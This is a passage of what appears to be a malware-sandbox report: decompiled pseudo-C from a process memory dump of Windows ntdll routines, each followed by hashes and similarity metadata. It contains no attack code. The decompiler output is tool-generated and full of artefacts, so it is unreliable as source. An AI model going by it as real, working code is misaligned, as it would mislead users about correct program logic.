            				char _t88;
            				intOrPtr* _t89;
            				intOrPtr _t91;
            				void* _t97;
            				intOrPtr _t100;
            				void* _t102;
            				void* _t107;
            				signed int _t108;
            				intOrPtr* _t112;
            				void* _t113;
            				intOrPtr* _t114;
            				intOrPtr _t115;
            				intOrPtr _t116;
            				intOrPtr _t117;
            				signed int _t118;
            				void* _t130;
            
            				_t120 = (_t118 & 0xfffffff8) - 0x4c;
            				_v8 =  *0x451d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
            				_t112 = __ecx;
            				_v77 = __edx;
            				_v48 = __ecx;
            				_v28 = 0;
            				_t5 = _t112 + 0xc; // 0x575651ff
            				_t105 =  *_t5;
            				_v20 = 0;
            				_v16 = 0;
            				if(_t105 == 0) {
            					_t50 = _t112 + 4; // 0x5de58b5b
            					_t60 =  *__ecx |  *_t50;
            					if(( *__ecx |  *_t50) != 0) {
            						 *__ecx = 0;
            						__ecx[1] = 0;
            						if(E04447D50() != 0) {
            							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
            						} else {
            							_t65 = 0x7ffe0386;
            						}
            						if( *_t65 != 0) {
            							E044F8CD6(_t112);
            						}
            						_push(0);
            						_t52 = _t112 + 0x10; // 0x778df98b
            						_push( *_t52);
            						_t60 = E04469E20();
            					}
            					L20:
            					_pop(_t107);
            					_pop(_t113);
            					_pop(_t87);
            					return E0446B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
            				}
            				_t8 = _t112 + 8; // 0x8b000cc2
            				_t67 =  *_t8;
            				_t88 =  *((intOrPtr*)(_t67 + 0x10));
            				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
            				_t108 =  *(_t67 + 0x14);
            				_t68 =  *((intOrPtr*)(_t105 + 0x14));
            				_t105 = 0x2710;
            				asm("sbb eax, edi");
            				_v44 = _t88;
            				_v52 = _t108;
            				_t60 = E0446CE00(_t97, _t68, 0x2710, 0);
            				_v56 = _t60;
            				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
            					L3:
            					 *(_t112 + 0x44) = _t60;
            					_t105 = _t60 * 0x2710 >> 0x20;
            					 *_t112 = _t88;
            					 *(_t112 + 4) = _t108;
            					_v20 = _t60 * 0x2710;
            					_v16 = _t60 * 0x2710 >> 0x20;
            					if(_v77 != 0) {
            						L16:
            						_v36 = _t88;
            						_v32 = _t108;
            						if(E04447D50() != 0) {
            							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
            						} else {
            							_t73 = 0x7ffe0386;
            						}
            						if( *_t73 != 0) {
            							_t105 = _v40;
            							E044F8F6A(_t112, _v40, _t88, _t108);
            						}
            						_push( &_v28);
            						_push(0);
            						_push( &_v36);
            						_t48 = _t112 + 0x10; // 0x778df98b
            						_push( *_t48);
            						_t60 = E0446AF60();
            						goto L20;
            					} else {
            						_t89 = 0x7ffe03b0;
            						do {
            							_t114 = 0x7ffe0010;
            							do {
            								_t77 =  *0x4518628; // 0x0
            								_v68 = _t77;
            								_t78 =  *0x451862c; // 0x0
            								_v64 = _t78;
            								_v72 =  *_t89;
            								_v76 =  *((intOrPtr*)(_t89 + 4));
            								while(1) {
            									_t105 =  *0x7ffe000c;
            									_t100 =  *0x7ffe0008;
            									if(_t105 ==  *_t114) {
            										goto L8;
            									}
            									asm("pause");
            								}
            								L8:
            								_t89 = 0x7ffe03b0;
            								_t115 =  *0x7ffe03b0;
            								_t82 =  *0x7FFE03B4;
            								_v60 = _t115;
            								_t114 = 0x7ffe0010;
            								_v56 = _t82;
            							} while (_v72 != _t115 || _v76 != _t82);
            							_t83 =  *0x4518628; // 0x0
            							_t116 =  *0x451862c; // 0x0
            							_v76 = _t116;
            							_t117 = _v68;
            						} while (_t117 != _t83 || _v64 != _v76);
            						asm("sbb edx, [esp+0x24]");
            						_t102 = _t100 - _v60 - _t117;
            						_t112 = _v48;
            						_t91 = _v44;
            						asm("sbb edx, eax");
            						_t130 = _t105 - _v52;
            						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
            							_t88 = _t102 - _t91;
            							asm("sbb edx, edi");
            							_t108 = _t105;
            						} else {
            							_t88 = 0;
            							_t108 = 0;
            						}
            						goto L16;
            					}
            				} else {
            					if( *(_t112 + 0x44) == _t60) {
            						goto L20;
            					}
            					goto L3;
            				}
            			}

















































            APIs
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0444B9A5
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
            • String ID:
            • API String ID: 885266447-0
            • Opcode ID: 67e9a4f2585a77eca1eb389b268c821ed94e88232f534921918eb689750e4ad0
            • Instruction ID: ee30e6ba3135732001f234be150a3fbdbcd968122205c1c13583f48e7c3c949e
            • Opcode Fuzzy Hash: 67e9a4f2585a77eca1eb389b268c821ed94e88232f534921918eb689750e4ad0
            • Instruction Fuzzy Hash: C3512471A083808FEB20DF69C48092BBBE5FBC8604F14896EE58597395E770F944CB92
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E0442B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
            				signed int _t65;
            				signed short _t69;
            				intOrPtr _t70;
            				signed short _t85;
            				void* _t86;
            				signed short _t89;
            				signed short _t91;
            				intOrPtr _t92;
            				intOrPtr _t97;
            				intOrPtr* _t98;
            				signed short _t99;
            				signed short _t101;
            				void* _t102;
            				char* _t103;
            				signed short _t104;
            				intOrPtr* _t110;
            				void* _t111;
            				void* _t114;
            				intOrPtr* _t115;
            
            				_t109 = __esi;
            				_t108 = __edi;
            				_t106 = __edx;
            				_t95 = __ebx;
            				_push(0x90);
            				_push(0x44ff7a8);
            				E0447D0E8(__ebx, __edi, __esi);
            				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
            				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
            				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
            				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
            				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
            				if(__edx == 0xffffffff) {
            					L6:
            					_t97 =  *((intOrPtr*)(_t114 - 0x78));
            					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
            					__eflags = _t65 & 0x00000002;
            					if((_t65 & 0x00000002) != 0) {
            						L3:
            						L4:
            						return E0447D130(_t95, _t108, _t109);
            					}
            					 *(_t97 + 0xfca) = _t65 | 0x00000002;
            					_t108 = 0;
            					_t109 = 0;
            					_t95 = 0;
            					__eflags = 0;
            					while(1) {
            						__eflags = _t95 - 0x200;
            						if(_t95 >= 0x200) {
            							break;
            						}
            						E0446D000(0x80);
            						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
            						_t108 = _t115;
            						_t95 = _t95 - 0xffffff80;
            						_t17 = _t114 - 4;
            						 *_t17 =  *(_t114 - 4) & 0x00000000;
            						__eflags =  *_t17;
            						_t106 =  *((intOrPtr*)(_t114 - 0x84));
            						_t110 =  *((intOrPtr*)(_t114 - 0x84));
            						_t102 = _t110 + 1;
            						do {
            							_t85 =  *_t110;
            							_t110 = _t110 + 1;
            							__eflags = _t85;
            						} while (_t85 != 0);
            						_t111 = _t110 - _t102;
            						_t21 = _t95 - 1; // -129
            						_t86 = _t21;
            						__eflags = _t111 - _t86;
            						if(_t111 > _t86) {
            							_t111 = _t86;
            						}
            						E0446F3E0(_t108, _t106, _t111);
            						_t115 = _t115 + 0xc;
            						_t103 = _t111 + _t108;
            						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
            						_t89 = _t95 - _t111;
            						__eflags = _t89;
            						_push(0);
            						if(_t89 == 0) {
            							L15:
            							_t109 = 0xc000000d;
            							goto L16;
            						} else {
            							__eflags = _t89 - 0x7fffffff;
            							if(_t89 <= 0x7fffffff) {
            								L16:
            								 *(_t114 - 0x94) = _t109;
            								__eflags = _t109;
            								if(_t109 < 0) {
            									__eflags = _t89;
            									if(_t89 != 0) {
            										 *_t103 = 0;
            									}
            									L26:
            									 *(_t114 - 0xa0) = _t109;
            									 *(_t114 - 4) = 0xfffffffe;
            									__eflags = _t109;
            									if(_t109 >= 0) {
            										L31:
            										_t98 = _t108;
            										_t39 = _t98 + 1; // 0x1
            										_t106 = _t39;
            										do {
            											_t69 =  *_t98;
            											_t98 = _t98 + 1;
            											__eflags = _t69;
            										} while (_t69 != 0);
            										_t99 = _t98 - _t106;
            										__eflags = _t99;
            										L34:
            										_t70 =  *[fs:0x30];
            										__eflags =  *((char*)(_t70 + 2));
            										if( *((char*)(_t70 + 2)) != 0) {
            											L40:
            											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
            											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
            											 *((intOrPtr*)(_t114 - 0x64)) = 2;
            											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
            											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
            											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
            											 *(_t114 - 4) = 1;
            											_push(_t114 - 0x74);
            											L0447DEF0(_t99, _t106);
            											 *(_t114 - 4) = 0xfffffffe;
            											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
            											goto L3;
            										}
            										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
            										if(( *0x7ffe02d4 & 0x00000003) != 3) {
            											goto L40;
            										}
            										_push( *((intOrPtr*)(_t114 + 8)));
            										_push( *((intOrPtr*)(_t114 - 0x9c)));
            										_push(_t99 & 0x0000ffff);
            										_push(_t108);
            										_push(1);
            										_t101 = E0446B280();
            										__eflags =  *((char*)(_t114 + 0x14)) - 1;
            										if( *((char*)(_t114 + 0x14)) == 1) {
            											__eflags = _t101 - 0x80000003;
            											if(_t101 == 0x80000003) {
            												E0446B7E0(1);
            												_t101 = 0;
            												__eflags = 0;
            											}
            										}
            										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
            										goto L4;
            									}
            									__eflags = _t109 - 0x80000005;
            									if(_t109 == 0x80000005) {
            										continue;
            									}
            									break;
            								}
            								 *(_t114 - 0x90) = 0;
            								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
            								_t91 = E0446E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
            								_t115 = _t115 + 0x10;
            								_t104 = _t91;
            								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
            								__eflags = _t104;
            								if(_t104 < 0) {
            									L21:
            									_t109 = 0x80000005;
            									 *(_t114 - 0x90) = 0x80000005;
            									L22:
            									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
            									L23:
            									 *(_t114 - 0x94) = _t109;
            									goto L26;
            								}
            								__eflags = _t104 - _t92;
            								if(__eflags > 0) {
            									goto L21;
            								}
            								if(__eflags == 0) {
            									goto L22;
            								}
            								goto L23;
            							}
            							goto L15;
            						}
            					}
            					__eflags = _t109;
            					if(_t109 >= 0) {
            						goto L31;
            					}
            					__eflags = _t109 - 0x80000005;
            					if(_t109 != 0x80000005) {
            						goto L31;
            					}
            					 *((short*)(_t95 + _t108 - 2)) = 0xa;
            					_t38 = _t95 - 1; // -129
            					_t99 = _t38;
            					goto L34;
            				}
            				if( *((char*)( *[fs:0x30] + 2)) != 0) {
            					__eflags = __edx - 0x65;
            					if(__edx != 0x65) {
            						goto L2;
            					}
            					goto L6;
            				}
            				L2:
            				_push( *((intOrPtr*)(_t114 + 8)));
            				_push(_t106);
            				if(E0446A890() != 0) {
            					goto L6;
            				}
            				goto L3;
            			}























            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID: _vswprintf_s
            • String ID:
            • API String ID: 677850445-0
            • Opcode ID: 564be9e258565ac75aa8df2d48c3dde4e925e2dae4b9b7539ccae93242da716e
            • Instruction ID: fe69e845a9c091ec82d83288511f695365a25510284b84b42b47979e8f6cefbb
            • Opcode Fuzzy Hash: 564be9e258565ac75aa8df2d48c3dde4e925e2dae4b9b7539ccae93242da716e
            • Instruction Fuzzy Hash: 9551E175D0066A8EEF30EF74C844BAEBBB0AF00314F1041AFD859AB381E73069458B91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 80%
            			E0445FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
            				char _v5;
            				signed int _v8;
            				signed int _v12;
            				char _v16;
            				char _v17;
            				char _v20;
            				signed int _v24;
            				char _v28;
            				char _v32;
            				signed int _v40;
            				void* __ecx;
            				void* __edi;
            				void* __ebp;
            				signed int _t73;
            				intOrPtr* _t75;
            				signed int _t77;
            				signed int _t79;
            				signed int _t81;
            				intOrPtr _t83;
            				intOrPtr _t85;
            				intOrPtr _t86;
            				signed int _t91;
            				signed int _t94;
            				signed int _t95;
            				signed int _t96;
            				signed int _t106;
            				signed int _t108;
            				signed int _t114;
            				signed int _t116;
            				signed int _t118;
            				signed int _t122;
            				signed int _t123;
            				void* _t129;
            				signed int _t130;
            				void* _t132;
            				intOrPtr* _t134;
            				signed int _t138;
            				signed int _t141;
            				signed int _t147;
            				intOrPtr _t153;
            				signed int _t154;
            				signed int _t155;
            				signed int _t170;
            				void* _t174;
            				signed int _t176;
            				signed int _t177;
            
            				_t129 = __ebx;
            				_push(_t132);
            				_push(__esi);
            				_t174 = _t132;
            				_t73 =  !( *( *(_t174 + 0x18)));
            				if(_t73 >= 0) {
            					L5:
            					return _t73;
            				} else {
            					E0443EEF0(0x4517b60);
            					_t134 =  *0x4517b84; // 0x776f7b80
            					_t2 = _t174 + 0x24; // 0x24
            					_t75 = _t2;
            					if( *_t134 != 0x4517b80) {
            						_push(3);
            						asm("int 0x29");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						asm("int3");
            						_push(0x4517b60);
            						_t170 = _v8;
            						_v28 = 0;
            						_v40 = 0;
            						_v24 = 0;
            						_v17 = 0;
            						_v32 = 0;
            						__eflags = _t170 & 0xffff7cf2;
            						if((_t170 & 0xffff7cf2) != 0) {
            							L43:
            							_t77 = 0xc000000d;
            						} else {
            							_t79 = _t170 & 0x0000000c;
            							__eflags = _t79;
            							if(_t79 != 0) {
            								__eflags = _t79 - 0xc;
            								if(_t79 == 0xc) {
            									goto L43;
            								} else {
            									goto L9;
            								}
            							} else {
            								_t170 = _t170 | 0x00000008;
            								__eflags = _t170;
            								L9:
            								_t81 = _t170 & 0x00000300;
            								__eflags = _t81 - 0x300;
            								if(_t81 == 0x300) {
            									goto L43;
            								} else {
            									_t138 = _t170 & 0x00000001;
            									__eflags = _t138;
            									_v24 = _t138;
            									if(_t138 != 0) {
            										__eflags = _t81;
            										if(_t81 != 0) {
            											goto L43;
            										} else {
            											goto L11;
            										}
            									} else {
            										L11:
            										_push(_t129);
            										_t77 = E04436D90( &_v20);
            										_t130 = _t77;
            										__eflags = _t130;
            										if(_t130 >= 0) {
            											_push(_t174);
            											__eflags = _t170 & 0x00000301;
            											if((_t170 & 0x00000301) == 0) {
            												_t176 = _a8;
            												__eflags = _t176;
            												if(__eflags == 0) {
            													L64:
            													_t83 =  *[fs:0x18];
            													_t177 = 0;
            													__eflags =  *(_t83 + 0xfb8);
            													if( *(_t83 + 0xfb8) != 0) {
            														E044376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
            														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
            													}
            													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
            													goto L15;
            												} else {
            													asm("sbb edx, edx");
            													_t114 = E044C8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
            													__eflags = _t114;
            													if(_t114 < 0) {
            														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
            														E0442B150();
            													}
            													_t116 = E044C6D81(_t176,  &_v16);
            													__eflags = _t116;
            													if(_t116 >= 0) {
            														__eflags = _v16 - 2;
            														if(_v16 < 2) {
            															L56:
            															_t118 = E044375CE(_v20, 5, 0);
            															__eflags = _t118;
            															if(_t118 < 0) {
            																L67:
            																_t130 = 0xc0000017;
            																goto L32;
            															} else {
            																__eflags = _v12;
            																if(_v12 == 0) {
            																	goto L67;
            																} else {
            																	_t153 =  *0x4518638; // 0x1828c0
            																	_t122 = L044338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
            																	_t154 = _v12;
            																	_t130 = _t122;
            																	__eflags = _t130;
            																	if(_t130 >= 0) {
            																		_t123 =  *(_t154 + 4) & 0x0000ffff;
            																		__eflags = _t123;
            																		if(_t123 != 0) {
            																			_t155 = _a12;
            																			__eflags = _t155;
            																			if(_t155 != 0) {
            																				 *_t155 = _t123;
            																			}
            																			goto L64;
            																		} else {
            																			E044376E2(_t154);
            																			goto L41;
            																		}
            																	} else {
            																		E044376E2(_t154);
            																		_t177 = 0;
            																		goto L18;
            																	}
            																}
            															}
            														} else {
            															__eflags =  *_t176;
            															if( *_t176 != 0) {
            																goto L56;
            															} else {
            																__eflags =  *(_t176 + 2);
            																if( *(_t176 + 2) == 0) {
            																	goto L64;
            																} else {
            																	goto L56;
            																}
            															}
            														}
            													} else {
            														_t130 = 0xc000000d;
            														goto L32;
            													}
            												}
            												goto L35;
            											} else {
            												__eflags = _a8;
            												if(_a8 != 0) {
            													_t77 = 0xc000000d;
            												} else {
            													_v5 = 1;
            													L0445FCE3(_v20, _t170);
            													_t177 = 0;
            													__eflags = 0;
            													L15:
            													_t85 =  *[fs:0x18];
            													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
            													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
            														L18:
            														__eflags = _t130;
            														if(_t130 != 0) {
            															goto L32;
            														} else {
            															__eflags = _v5 - _t130;
            															if(_v5 == _t130) {
            																goto L32;
            															} else {
            																_t86 =  *[fs:0x18];
            																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
            																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
            																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
            																}
            																__eflags = _t177;
            																if(_t177 == 0) {
            																	L31:
            																	__eflags = 0;
            																	L044370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
            																	goto L32;
            																} else {
            																	__eflags = _v24;
            																	_t91 =  *(_t177 + 0x20);
            																	if(_v24 != 0) {
            																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
            																		goto L31;
            																	} else {
            																		_t141 = _t91 & 0x00000040;
            																		__eflags = _t170 & 0x00000100;
            																		if((_t170 & 0x00000100) == 0) {
            																			__eflags = _t141;
            																			if(_t141 == 0) {
            																				L74:
            																				_t94 = _t91 & 0xfffffffd | 0x00000004;
            																				goto L27;
            																			} else {
            																				_t177 = E0445FD22(_t177);
            																				__eflags = _t177;
            																				if(_t177 == 0) {
            																					goto L42;
            																				} else {
            																					_t130 = E0445FD9B(_t177, 0, 4);
            																					__eflags = _t130;
            																					if(_t130 != 0) {
            																						goto L42;
            																					} else {
            																						_t68 = _t177 + 0x20;
            																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
            																						__eflags =  *_t68;
            																						_t91 =  *(_t177 + 0x20);
            																						goto L74;
            																					}
            																				}
            																			}
            																			goto L35;
            																		} else {
            																			__eflags = _t141;
            																			if(_t141 != 0) {
            																				_t177 = E0445FD22(_t177);
            																				__eflags = _t177;
            																				if(_t177 == 0) {
            																					L42:
            																					_t77 = 0xc0000001;
            																					goto L33;
            																				} else {
            																					_t130 = E0445FD9B(_t177, 0, 4);
            																					__eflags = _t130;
            																					if(_t130 != 0) {
            																						goto L42;
            																					} else {
            																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
            																						_t91 =  *(_t177 + 0x20);
            																						goto L26;
            																					}
            																				}
            																				goto L35;
            																			} else {
            																				L26:
            																				_t94 = _t91 & 0xfffffffb | 0x00000002;
            																				__eflags = _t94;
            																				L27:
            																				 *(_t177 + 0x20) = _t94;
            																				__eflags = _t170 & 0x00008000;
            																				if((_t170 & 0x00008000) != 0) {
            																					_t95 = _a12;
            																					__eflags = _t95;
            																					if(_t95 != 0) {
            																						_t96 =  *_t95;
            																						__eflags = _t96;
            																						if(_t96 != 0) {
            																							 *((short*)(_t177 + 0x22)) = 0;
            																							_t40 = _t177 + 0x20;
            																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
            																							__eflags =  *_t40;
            																						}
            																					}
            																				}
            																				goto L31;
            																			}
            																		}
            																	}
            																}
            															}
            														}
            													} else {
            														_t147 =  *( *[fs:0x18] + 0xfc0);
            														_t106 =  *(_t147 + 0x20);
            														__eflags = _t106 & 0x00000040;
            														if((_t106 & 0x00000040) != 0) {
            															_t147 = E0445FD22(_t147);
            															__eflags = _t147;
            															if(_t147 == 0) {
            																L41:
            																_t130 = 0xc0000001;
            																L32:
            																_t77 = _t130;
            																goto L33;
            															} else {
            																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
            																_t106 =  *(_t147 + 0x20);
            																goto L17;
            															}
            															goto L35;
            														} else {
            															L17:
            															_t108 = _t106 | 0x00000080;
            															__eflags = _t108;
            															 *(_t147 + 0x20) = _t108;
            															 *( *[fs:0x18] + 0xfc0) = _t147;
            															goto L18;
            														}
            													}
            												}
            											}
            											L33:
            										}
            									}
            								}
            							}
            						}
            						L35:
            						return _t77;
            					} else {
            						 *_t75 = 0x4517b80;
            						 *((intOrPtr*)(_t75 + 4)) = _t134;
            						 *_t134 = _t75;
            						 *0x4517b84 = _t75;
            						_t73 = E0443EB70(_t134, 0x4517b60);
            						if( *0x4517b20 != 0) {
            							_t73 =  *( *[fs:0x30] + 0xc);
            							if( *((char*)(_t73 + 0x28)) == 0) {
            								_t73 = E0443FF60( *0x4517b20);
            							}
            						}
            						goto L5;
            					}
            				}
            			}

            Strings
            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0449BE0F
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
            • API String ID: 0-865735534
            • Opcode ID: 3af3bab768e3409b2900d0dfc56a493bf7e092949cf76eb3a0c9680df09ae1af
            • Instruction ID: 32c551bb17e1b2822ce1c6ca5df999b008bce532e1d4270410857475aff8a8db
            • Opcode Fuzzy Hash: 3af3bab768e3409b2900d0dfc56a493bf7e092949cf76eb3a0c9680df09ae1af
            • Instruction Fuzzy Hash: 0BA1CF71B006468BEF269F69C450B6AB7B5FB48714F04457FDC468B7A2EB30F8099B81
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 63%
            			E04422D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
            				signed char _v8;
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				signed int _v52;
            				void* __esi;
            				void* __ebp;
            				intOrPtr _t55;
            				signed int _t57;
            				signed int _t58;
            				char* _t62;
            				signed char* _t63;
            				signed char* _t64;
            				signed int _t67;
            				signed int _t72;
            				signed int _t77;
            				signed int _t78;
            				signed int _t88;
            				intOrPtr _t89;
            				signed char _t93;
            				signed int _t97;
            				signed int _t98;
            				signed int _t102;
            				signed int _t103;
            				intOrPtr _t104;
            				signed int _t105;
            				signed int _t106;
            				signed char _t109;
            				signed int _t111;
            				void* _t116;
            
            				_t102 = __edi;
            				_t97 = __edx;
            				_v12 = _v12 & 0x00000000;
            				_t55 =  *[fs:0x18];
            				_t109 = __ecx;
            				_v8 = __edx;
            				_t86 = 0;
            				_v32 = _t55;
            				_v24 = 0;
            				_push(__edi);
            				if(__ecx == 0x4515350) {
            					_t86 = 1;
            					_v24 = 1;
            					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
            				}
            				_t103 = _t102 | 0xffffffff;
            				if( *0x4517bc8 != 0) {
            					_push(0xc000004b);
            					_push(_t103);
            					E044697C0();
            				}
            				if( *0x45179c4 != 0) {
            					_t57 = 0;
            				} else {
            					_t57 = 0x45179c8;
            				}
            				_v16 = _t57;
            				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
            					_t93 = _t109;
            					L23();
            				}
            				_t58 =  *_t109;
            				if(_t58 == _t103) {
            					__eflags =  *(_t109 + 0x14) & 0x01000000;
            					_t58 = _t103;
            					if(__eflags == 0) {
            						_t93 = _t109;
            						E04451624(_t86, __eflags);
            						_t58 =  *_t109;
            					}
            				}
            				_v20 = _v20 & 0x00000000;
            				if(_t58 != _t103) {
            					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
            				}
            				_t104 =  *((intOrPtr*)(_t109 + 0x10));
            				_t88 = _v16;
            				_v28 = _t104;
            				L9:
            				while(1) {
            					if(E04447D50() != 0) {
            						_t62 = ( *[fs:0x30])[0x50] + 0x228;
            					} else {
            						_t62 = 0x7ffe0382;
            					}
            					if( *_t62 != 0) {
            						_t63 =  *[fs:0x30];
            						__eflags = _t63[0x240] & 0x00000002;
            						if((_t63[0x240] & 0x00000002) != 0) {
            							_t93 = _t109;
            							E044BFE87(_t93);
            						}
            					}
            					if(_t104 != 0xffffffff) {
            						_push(_t88);
            						_push(0);
            						_push(_t104);
            						_t64 = E04469520();
            						goto L15;
            					} else {
            						while(1) {
            							_t97 =  &_v8;
            							_t64 = E0445E18B(_t109 + 4, _t97, 4, _t88, 0);
            							if(_t64 == 0x102) {
            								break;
            							}
            							_t93 =  *(_t109 + 4);
            							_v8 = _t93;
            							if((_t93 & 0x00000002) != 0) {
            								continue;
            							}
            							L15:
            							if(_t64 == 0x102) {
            								break;
            							}
            							_t89 = _v24;
            							if(_t64 < 0) {
            								L0447DF30(_t93, _t97, _t64);
            								_push(_t93);
            								_t98 = _t97 | 0xffffffff;
            								__eflags =  *0x4516901;
            								_push(_t109);
            								_v52 = _t98;
            								if( *0x4516901 != 0) {
            									_push(0);
            									_push(1);
            									_push(0);
            									_push(0x100003);
            									_push( &_v12);
            									_t72 = E04469980();
            									__eflags = _t72;
            									if(_t72 < 0) {
            										_v12 = _t98 | 0xffffffff;
            									}
            								}
            								asm("lock cmpxchg [ecx], edx");
            								_t111 = 0;
            								__eflags = 0;
            								if(0 != 0) {
            									__eflags = _v12 - 0xffffffff;
            									if(_v12 != 0xffffffff) {
            										_push(_v12);
            										E044695D0();
            									}
            								} else {
            									_t111 = _v12;
            								}
            								return _t111;
            							} else {
            								if(_t89 != 0) {
            									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
            									_t77 = E04447D50();
            									__eflags = _t77;
            									if(_t77 == 0) {
            										_t64 = 0x7ffe0384;
            									} else {
            										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
            									}
            									__eflags =  *_t64;
            									if( *_t64 != 0) {
            										_t64 =  *[fs:0x30];
            										__eflags = _t64[0x240] & 0x00000004;
            										if((_t64[0x240] & 0x00000004) != 0) {
            											_t78 = E04447D50();
            											__eflags = _t78;
            											if(_t78 == 0) {
            												_t64 = 0x7ffe0385;
            											} else {
            												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
            											}
            											__eflags =  *_t64 & 0x00000020;
            											if(( *_t64 & 0x00000020) != 0) {
            												_t64 = E044A7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
            											}
            										}
            									}
            								}
            								return _t64;
            							}
            						}
            						_t97 = _t88;
            						_t93 = _t109;
            						E044BFDDA(_t97, _v12);
            						_t105 =  *_t109;
            						_t67 = _v12 + 1;
            						_v12 = _t67;
            						__eflags = _t105 - 0xffffffff;
            						if(_t105 == 0xffffffff) {
            							_t106 = 0;
            							__eflags = 0;
            						} else {
            							_t106 =  *(_t105 + 0x14);
            						}
            						__eflags = _t67 - 2;
            						if(_t67 > 2) {
            							__eflags = _t109 - 0x4515350;
            							if(_t109 != 0x4515350) {
            								__eflags = _t106 - _v20;
            								if(__eflags == 0) {
            									_t93 = _t109;
            									E044BFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
            								}
            							}
            						}
            						_push("RTL: Re-Waiting\n");
